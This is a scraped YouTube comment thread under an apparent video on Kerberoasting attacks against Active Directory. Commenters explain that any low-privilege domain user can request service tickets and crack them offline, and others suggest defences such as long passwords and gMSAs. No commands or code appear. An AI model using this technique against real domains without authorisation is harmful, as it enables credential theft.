Question. When you are enumerating the SPNs are the ones that are vulnerable the user must have access to correct? So if the HTTP SPN was vulnerable but the user did not have access to it they would not be able to get that TGS right?
I understand that. But not everyone has access to request the tgs correct? I.e sql server. Not everyone can get this ticket as only privileged accounts should be able to access it so the attacker would need to compromise this type of account. but if the compromised account was a normal user and requested the tgs wouldn’t it be not granted correct..?
Everyone can request a TGS, Domain Controller only provides Security Info about the user (PAC), it's up to the Service Account itself to check the user's rights in the TGS. The Security concern here is that DC use a piece of the secret of the requested service to encrypt the TGS which can be later used to brute force/crack the password.
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
i mean .... yeah; with domain admin privileges anything is possible. So? Thats like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
![[Attack]tive Directory: Compromising a Network in 20 Minutes Through Active Directory](http://i.ytimg.com/vi/MIt-tIjMr08/mqdefault.jpg)
![[Attack]tive Directory: Compromising a Network in 20 Minutes Through Active Directory](/img/tr.png)
This guy is unstoppable, never misses a video, so damn consistent,❤
as a CRTE and CARTP holder, im glad to see alteredsec sponsoring the video. hopefully we'll see the certs appear on more job posting.
So by just getting a user on a domain you can get the TGT and TGS from the domain controller,cos it sees you as an authenticated user on the system..
Good stuff John. Thanks.
Thanks. I have done kerberoasting before but never understood what I was doing at this level. Super cool stuff.
first time i needed the subscribe and alarm bell button
Great video man!
Question. When you are enumerating the SPNs are the ones that are vulnerable the user must have access to correct? So if the HTTP SPN was vulnerable but the user did not have access to it they would not be able to get that TGS right?
SPNs are not hidden. Everyone has access to them.
I understand that. But not everyone has access to request the tgs correct? I.e sql server. Not everyone can get this ticket as only privileged accounts should be able to access it so the attacker would need to compromise this type of account. but if the compromised account was a normal user and requested the tgs wouldn’t it be not granted correct..?
Everyone can request a TGS, Domain Controller only provides Security Info about the user (PAC), it's up to the Service Account itself to check the user's rights in the TGS.
The Security concern here is that DC use a piece of the secret of the requested service to encrypt the TGS which can be later used to brute force/crack the password.
@hammond
What OS do run on your baremetal ?
Most likely either a MacOS or an SE Linux distro
Any valid coupons for CRT? :)
What windows server version did you use ?
I still miss the honey badger video :(
I was contemplating sending a secret message to kelly ripa on X saying that I learned that she was basically on soultrain from Questlove.
Great job...greetings from italy
So many of these attacks rely on already having domain admin or schema admin, or assume that the IT staff is hopelessly incompetent.
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
@@BrownCoatFanThanks
And there are plenty of incompetent AD admins out there .
So this is why you've been asking twitter for the password? 😂
😂😂😂😂😂
Awesome content 👏
Simply amazing!!!
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
Yes, use a very long (25 characters) and complex password.
Prefer GMSA if your App/System supports it. If not, a long, very complex password could help...
@@NawdiralgMSAs are so nice. Password lifetime of 24hrs and with length of 120chars. Also, they do not pretend to be user accounts.
Finally man
thanks 👍
🔥🔥🔥🔥🔥
Use excalidraw next time 😂
It is a shame there's no easy way to snapshot an AD, no?
Taylor Jose Lee Jeffrey Williams Timothy
It's amazing how a 22 minute video about kerberoasting only has about 2 minutes worth of kerberoasting
I’m sayin😂
😃 🚀 ❤️
Alh4zr3d, is it you 🤨🤭😅🥳
first
👑 here's your crown
@@baxsmthanks bud
Frist hehe
You know, talking this fast, you're not really teaching anything as much as blowing through content that isn't digestible by people.
i mean .... yeah; with domain admin privileges anything is possible. So? Thats like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
Kerberoasting is done from any low privilege domain user. We used the domain user account "Alice".
Every time I watch @johnhammond I just feel like an idiot, so unworthy 😞
I like you, but this one was a weak video. The whole scripting thing is way too much to "learn Active Directory Kerberoasting".
Pretty useless information if you have a minimum requirement of at least 13 characters with good complexity , a good EDR installed etc.....
@hammond
What OS do run on your baremetal ?
If you mean OS running on his real machine then it's Windows 10